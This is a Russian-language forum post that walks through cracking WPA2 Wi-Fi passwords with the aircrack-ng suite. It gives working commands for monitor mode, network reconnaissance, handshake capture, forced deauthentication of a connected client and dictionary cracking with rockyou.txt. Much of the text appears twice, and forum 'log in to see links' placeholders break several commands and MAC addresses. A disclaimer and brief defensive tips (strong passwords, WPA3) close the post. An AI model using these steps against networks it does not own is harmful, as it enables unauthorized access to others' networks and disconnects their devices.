20.07.26
4
Penetration Tester, SOC Analyst, Dark Web Analyst
0
Всем привет, вы можете знать меня как Торба, достаточно популярный в очень узких кругах блогер по кибербезопасности, сегодня я решил написать статью о взломе вай фая, естественно все в целях образования, и это не гайд на взлом, а всего лишь разбор очень популярного вида атаки, которая теряет свою актуальность, всвязи с переходом на WPA 3,
итак начнем с того
что нам понадобится
По умолчанию твой адаптер просто получает пакеты, адресованные тебе. Нам нужно видеть всё, что происходит в эфире.
bash
Смотрим имя твоего интерфейса (обычно wlan0 или wlan1)
sudo airmon-ng
Отключаем всё, что мешает (NetworkManager мешает переключать режимы)
sudo systemctl stop NetworkManager
Переводим адаптер в режим монитора
sudo airmon-ng start wlan0
Теперь у тебя появится интерфейс, например, wlan0mon
Теперь твой адаптер слышит всех. Это как микрофон, который записывает все разговоры в комнате.
Шаг 2. Разведка: ищем цель
Запускаем поиск сетей. Нам нужна та, у которой есть клиенты.
bash
sudo airodump-ng wlan0mon
Ты увидишь таблицу. Нас интересуют:
Шаг 3. Захват рукопожатия
Это сердце атаки. Когда устройство (твой телефон) подключается к роутеру, они обмениваются специальными пакетами — это и есть рукопожатие. В нем зашифрован пароль. Наша задача — его перехватить.
Запускаем захват на конкретной сети и канале:
bash
sudo airodump-ng -c 6 --bssid AA:BB:CC
Где:
Если клиент есть, но рукопожатие не захватывается, мы его выгоняем из сети. Когда он переподключится автоматически, мы поймаем рукопожатие.
В новом терминале:
bash
sudo aireplay-ng -0 2 -a AA:BB:CC
Что значит:
Шаг 4. Подбор пароля (самый нудный этап)
Рукопожатие зашифровано. Единственный способ получить пароль — перебирать варианты в офлайн-режиме. Мы будем использовать aircrack-ng и мощный словарь.
bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC
Если у тебя нет rockyou.txt (он часто лежит в /usr/share/wordlists/), его нужно разархивировать:
bash
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
Что происходит: программа берёт каждый пароль из словаря, шифрует его, сравнивает с рукопожатием. Если совпало — пароль найден.
Важный нюанс: rockyou.txt содержит 14 миллионов паролей. Если пароль сложный (2#kL9$pQ), такой словарь не поможет. Тогда нужны маски (правила, где мы знаем формат, например, дата рождения + имя).
Итог: почему это сработало?
Потому что WPA2 имеет слабое место — четырёхстороннее рукопожатие. Его можно перехватить, если ты находишься в радиусе действия. И если пароль есть в словаре, он будет взломан.
Что делают умные люди:
*Данный материал предназначен исключительно для тестирования собственных сетей, получения официального разрешения владельца или для CTF/учебных полигонов. Любое использование против третьих лиц преследуется по закону.
итак начнем с того
что нам понадобится
- Kali Linux. Можно на виртуалке, можно на флешке. Важно, чтобы он видел Wi-Fi адаптер.
- Wi-Fi адаптер с поддержкой режима монитора. Встроенные карты ноутбуков часто не умеют отправлять нужные пакеты. Нужен внешний, например, на чипе RTL8812AU или Atheros AR9271.
- Терпение. Автоматические программы — это для блогеров. Мы будем делать руками, чтобы понимать каждый шаг.
По умолчанию твой адаптер просто получает пакеты, адресованные тебе. Нам нужно видеть всё, что происходит в эфире.
bash
Смотрим имя твоего интерфейса (обычно wlan0 или wlan1)
sudo airmon-ng
Отключаем всё, что мешает (NetworkManager мешает переключать режимы)
sudo systemctl stop NetworkManager
Переводим адаптер в режим монитора
sudo airmon-ng start wlan0
Теперь у тебя появится интерфейс, например, wlan0mon
Теперь твой адаптер слышит всех. Это как микрофон, который записывает все разговоры в комнате.
Шаг 2. Разведка: ищем цель
Запускаем поиск сетей. Нам нужна та, у которой есть клиенты.
bash
sudo airodump-ng wlan0mon
Ты увидишь таблицу. Нас интересуют:
- BSSID – уникальный адрес роутера (типа AA:BB:CCПожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки или изображения.D:EE:FF).
- CH – канал, на котором вещает сеть.
- ENC – шифрование. Если видишь WPA2 – это то, что нам нужно. Без шифра (OPN) — ловить нечего, там и так все видят.
- Data – количество перехваченных пакетов с данными. Если значение растет – есть активный клиент.
Шаг 3. Захват рукопожатия
Это сердце атаки. Когда устройство (твой телефон) подключается к роутеру, они обмениваются специальными пакетами — это и есть рукопожатие. В нем зашифрован пароль. Наша задача — его перехватить.
Запускаем захват на конкретной сети и канале:
bash
sudo airodump-ng -c 6 --bssid AA:BB:CC
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки или изображения.
D:EE:FF -w capture wlan0monГде:
- -c 6 – канал, который ты запомнил.
- --bssid ... – мак-адрес роутера.
- -w capture – записываем всё в файл с именем capture.
Если клиент есть, но рукопожатие не захватывается, мы его выгоняем из сети. Когда он переподключится автоматически, мы поймаем рукопожатие.
В новом терминале:
bash
sudo aireplay-ng -0 2 -a AA:BB:CC
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки или изображения.
D:EE:FF -c MAC_телефона wlan0monЧто значит:
- -0 2 – послать 2 deauth-пакета (команда "отключись").
- -a ... – роутер.
- -c ... – телефон (клиент).
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки или изображения.
D:EE:FF. Это победа. У нас есть файл capture-01.cap, в котором лежит рукопожатие.Шаг 4. Подбор пароля (самый нудный этап)
Рукопожатие зашифровано. Единственный способ получить пароль — перебирать варианты в офлайн-режиме. Мы будем использовать aircrack-ng и мощный словарь.
bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки или изображения.
D:EE:FF capture-01.capЕсли у тебя нет rockyou.txt (он часто лежит в /usr/share/wordlists/), его нужно разархивировать:
bash
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
Что происходит: программа берёт каждый пароль из словаря, шифрует его, сравнивает с рукопожатием. Если совпало — пароль найден.
Важный нюанс: rockyou.txt содержит 14 миллионов паролей. Если пароль сложный (2#kL9$pQ), такой словарь не поможет. Тогда нужны маски (правила, где мы знаем формат, например, дата рождения + имя).
Итог: почему это сработало?
Потому что WPA2 имеет слабое место — четырёхстороннее рукопожатие. Его можно перехватить, если ты находишься в радиусе действия. И если пароль есть в словаре, он будет взломан.
Что делают умные люди:
- Используют пароли, которых нет в словарях (включают спецсимволы, меняют регистр).
- Включают WPA3 (новый стандарт, там защита от этого метода).
Последнее редактирование модератором: